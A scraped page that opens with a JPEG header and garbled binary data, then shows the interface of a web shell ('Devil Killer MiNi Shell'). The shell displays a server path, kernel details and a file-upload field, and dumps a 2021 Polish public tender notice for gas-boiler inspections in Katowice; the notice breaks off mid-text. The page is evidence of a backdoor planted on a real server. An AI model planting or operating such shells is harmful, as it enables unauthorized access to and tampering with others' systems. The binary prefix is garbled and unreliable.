JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210827/0016267801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Roczne przeglądy kotłów gazowych dwufunkcyjnych w budynkach KZGM w Katowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOMUNALNY ZAKŁAD GOSPODARKI MIESZKANIOWEJ W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 241031620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Michała Grażyńskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-126</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/4163160</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32/2582025</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kzgm.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kzgm.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roczne przeglądy kotłów gazowych dwufunkcyjnych w budynkach KZGM w Katowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0676b28-0720-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00162678</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002618/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Roczne przeglądy kotłów gazowych dwufunkcyjnych w budynkach KZGM w Katowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kzgm_katowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kzgm_katowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu między zamawiającym a wykonawcami odbywa się wyłącznieprzy<br/>użyciu środków komunikacji elektronicznej. W celu skrócenia czasu udzielenia odpowiedzi napytania<br/>preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkieoświadczenia,<br/>wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem Platformyi formularza<br/>„Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń,wniosków,<br/>zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformypoprzez<br/>kliknięcie przycisku „Wyślij wiadomość” po których pojawi się komunikat, że wiadomośćzostała<br/>wysłana do zamawiającego. 2.Zamawiający będzie przekazywał wykonawcom informacjeza<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji,zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie wsekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jestkonkretny<br/>wykonawca, będzie przekazywana za pośrednictwem Platformy do konkretnego<br/>wykonawcy.3.Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.plzostały wskazane w rozdziale XII SWZ. 4. Informację o wyborze oferty<br/>najkorzystniejszej bądź ounieważnieniu postępowania Zamawiający zamieści na stronie internetowej<br/>prowadzonego postępowania, tj. na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I.1. Zamówienie wiąże się z powierzeniem<br/>Wykonawcyprzetwarzania danych osobowych niezbędnych do jego realizacji tj: imion i nazwisk,<br/>adresów oraznumerów telefonów osób zajmujących lokale w budynkach objętych umową. 2.<br/>Szczegółowy zakresokreśla umowa powierzenia przetwarzania danych osobowych (załącznik nr 7 do<br/>SWZ). 3. Przedpodpisaniem umowy wybrany Wykonawca zobowiązany jest do zawarcia z<br/>Zamawiającym ww umowy.4. Odmowa podpisania ww. umowy będzie traktowana jako odmowa<br/>podpisania umowy o udzieleniezamówienia. II. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniemdanych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1),zwanym dalej „RODO” Zamawiający informuje, że: 1. administratorem Pani/Pana<br/>danych osobowychjest Komunalny Zakład Gospodarki Mieszkaniowej w Katowicach, 40-126 Katowice,<br/>ul. Grażyńskiego5, Telefon: 32 258 20 21 do 25 lub 32/416 32 91, Fax: 32/258 20 25; 2. z Inspektorem<br/>Ochrony DanychOsobowych można się skontaktować pod nr tel.: 032 416 32 85, e‑mail:<br/>iod@kzgm.katowice.pl lubpisemnie na adres Zamawiającego. 3. Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art.6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie niniejszego zamówieniapublicznego; 4. odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 ust. 1 ustawyPrawo zamówień publicznych; 5. Pani/Pana dane osobowe będą<br/>przechowywane przez okres, którywyznaczony zostanie przede wszystkim na podstawie<br/>rozporządzenia Prezesa Rady Ministrów wsprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawiedziałania archiwów zakładowych, chyba że przepisy szczególne<br/>stanowią inaczej; 6. obowiązekpodania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiemustawowym określonym w przepisach ustawy, związanym z udziałem w<br/>postępowaniu o udzieleniezamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Prawozamówień publicznych; 7. w odniesieniu do Pani/Pana danych osobowych<br/>decyzje nie będąpodejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8. posiada<br/>Pani/Pan: • napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawieart. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*; • na podstawie<br/>art. 18 RODOprawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO**; • prawo do wniesienia skargi do<br/>Prezesa UrzęduOchrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Panadotyczących narusza przepisy RODO; 9. nie przysługuje Pani/Panu: • w związku<br/>z art. 17 ust. 3 lit. b, dlub e RODO prawo do usunięcia danych osobowych; • prawo do przenoszenia<br/>danych osobowych, októrym mowa w art. 20 RODO; • na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzaniadanych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust.1 lit. c RODO. * Wyjaśnienie: skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianąwyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresieniezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników.**Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu<br/>doprzechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu<br/>ochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego<br/>UniiEuropejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.231.039.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie wykonania rocznych przeglądów 309 kotłów gazowych dwufunkcyjnych o mocy do 24kW w instalacjach etażowych centralnego ogrzewania w budynkach i lokalach zarządzanych przez KZGM w Katowicach (Oddziały Eksploatacji EB1-EB6). <br/> Roczny przegląd kotłów gazowych dwufunkcyjnych o mocy do 24 kW obejmuje następujący zakres czynności:<br/> 1) Wyczyszczenie wnętrza urządzenia i obudowy,<br/> 2) Wyczyszczenie wymiennika pierwotnego po stronie przepływu gazów spalinowych,<br/> 3) Wyczyszczenie palnika głównego,<br/> 4) Sprawdzenie wystąpienia uszkodzeń lub korozji czopucha,<br/> 5) Sprawdzenie prawidłowego działania zapalacza lub elektronicznego zapłonu,<br/> 6) Kontrola właściwego działania palnika w fazie c.o. i c.w.u.,<br/> 7) Skuteczność działania elektrycznego głównego wyłącznika umieszczonego na kotle,<br/> 8) Skuteczność działania termostatu c.o. i c.w.u.,<br/> 9) Sprawdzenie szczelności obiegu gazowego,<br/> 10) Sprawdzenie czasu zadziałania zabezpieczenia przed zanikiem ciągu kominowego,<br/> 11) Sprawdzenie szczelności obiegów wody i śladów utleniania na złączkach,<br/> 12) Sprawdzenie działania i drożności wypływu z zaworu bezpieczeństwa,<br/> 13) Kontrola i czyszczenie syfonów (dotyczy kotłów kondensacyjnych),<br/> 14) Kontrola funkcjonowania regulatora pokojowego, <br/> 15) Wizualna kontrola przewodów powietrzno-spalinowych (dotyczy kotłów TURBO <br/>i kondensacyjnych),<br/> 16) Sprawdzenie działania zaworu trójdrogowego,<br/> 17) Przegląd pompy wodnej.<br/>2. Zamawiający przewiduje wykonanie przeglądu 309 kotłów gazowych dwufunkcyjnych w okresie obowiązywania umowy, jednak zastrzega sobie prawo do niewykorzystania całości zamówienia (w szczególności w przypadkach, o których mowa w pkt. 4, lub z innych przyczyn, np. w braku dostępu do lokalu w związku ze stanem epidemii), co wiąże się z odpowiednim obniżeniem wynagrodzenia, a Wykonawcy nie przysługuje roszczenie z tego tytułu. Minimalny zakres zamówienia to przegląd 260 kotłów. <br/>3. Zestawienie adresowe liczby lokali z kotłami gazowymi dwufunkcyjnymi objętych przedmiotem zamówienia zawiera Załącznik nr 2 do projektowanych postanowień umowy. W przypadku zmian w liczbie lokali administrowanych przez Zamawiającego oraz dokonanych zmian w ich wyposażeniu po dacie zawarcia umowy Zamawiający jest uprawniony do korygowania liczby lokali objętych umową.<br/>4. Szczegółowy zakres usług, wszelkie obowiązki Wykonawcy i Zamawiającego oraz warunki realizacji przedmiotu zamówienia i sposób rozliczania zawierają projektowane postanowienia umowy stanowiące Załącznik nr 4 do SWZ.<br/>5. Zamawiający nie wymaga zatrudnienia na podstawie umów o pracę osób, zaangażowanych w realizację zamówienia.<br/>6. Przedmiotowe środki dowodowe. Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia.<br/>7. Nie dokonano podziału zamówienia na części, z uwagi na to, że zakres zamówienia jest niewielki, a jego podział prowadziłby do nadmiernego rozdrobnienia i nieuzasadnionego zwiększenia kosztów realizacji. Niedokonanie podziału zamówienia na części nie ogranicza konkurencji ani dostępu do zamówienia wykonawcom z kategorii MŚP. W dotychczas prowadzonych postępowaniach na wykonanie tego typu usług brali udział mali i średni przedsiębiorcy, dlatego ryzyko zmniejszenia konkurencji poprzez niedokonanie podziału, praktycznie nie istnieje. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50531100-7 - Usługi w zakresie napraw i konserwacji kotłów grzewczych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71356100-9 - Usługi kontroli technicznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy, polegających na powtórzeniu podobnych usług tj. rocznych przeglądów kotłów gazowych dwufunkcyjnych o mocy do 24kW w instalacjach etażowych centralnego ogrzewania w budynkach i lokalach zarządzanych przez KZGM w Katowicach (Oddziały Eksploatacji EB1-EB6). Maksymalna wartość planowanych podobnych zamówień nie przekroczy kwoty 92.700,00 zł netto. Zamawiający udzieli zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy na następujących warunkach:<br/> 1) wykonawca realizował dotychczasowe zamówienie w terminie i z najwyższą starannością,<br/> 2) wykonawca zapewni nie gorszy standard wykonania nowego zamówienia niż podstawowego,<br/> 3) strony w wyniku negocjacji uzgodnią wynagrodzenie i termin wykonania nowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta wg kryteriów określonych w SWZ (Rozdz. XVIII<br/>"Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert")</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 2 pkt 4 ustawy w zakresie zdolności technicznej lub zawodowej:<br/> Wykonawca musi wykazać, że dysponuje lub będzie dysponował następującymi osobami skierowanymi do realizacji zamówienia: <br/> 1) co najmniej jedną osobą posiadająca kwalifikacje uprawniające do wykonywania dozoru urządzeń i instalacji elektrycznych (Grupa I) – zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, <br/> 2) co najmniej jedną osobą posiadająca kwalifikacje uprawniające do wykonywania dozoru urządzeń i instalacji gazowych (Grupa III) – zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, <br/> 3) co najmniej dwoma osobami posiadającymi kwalifikacje uprawniające do wykonywania eksploatacji urządzeń i instalacji elektrycznych (Grupa I) – zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, <br/> 4) co najmniej dwoma osobami posiadającymi kwalifikacje uprawniające do wykonywania eksploatacji urządzeń i instalacji gazowych (Grupa III) – zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, <br/> 5) co najmniej jedną osobą posiadająca uprawnienia serwisowe kotłów gazowych firmy TIFEL,<br/> 6) co najmniej jedną osobą posiadająca uprawnienia serwisowe kotłów gazowych firmy BERETTA,<br/> 7) co najmniej jedną osobą posiadającą uprawnienia serwisowe kotłów gazowych co najmniej jednej z firm: RADIANT, RAVENHEAT, VAILLANT, Junkers, Saunier Duvall, De Dietrich.<br/> <br/>UWAGA: <br/>1) Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.<br/>2) Osoby, które Wykonawca wykaże na potwierdzenie spełniania warunku udziału w postępowaniu muszą uczestniczyć w realizacji przedmiotu umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona w celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia zostanie wezwany do przedłożenia następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/>oświadczenia w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Ww. oświadczenie składa każdy z Wykonawców wspólnie składających ofertę</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona w celu potwierdzenia spełniania warunków udziału w postępowaniu zostanie wezwany do przedłożenia następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/>wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji i uprawnień, zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe. Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o 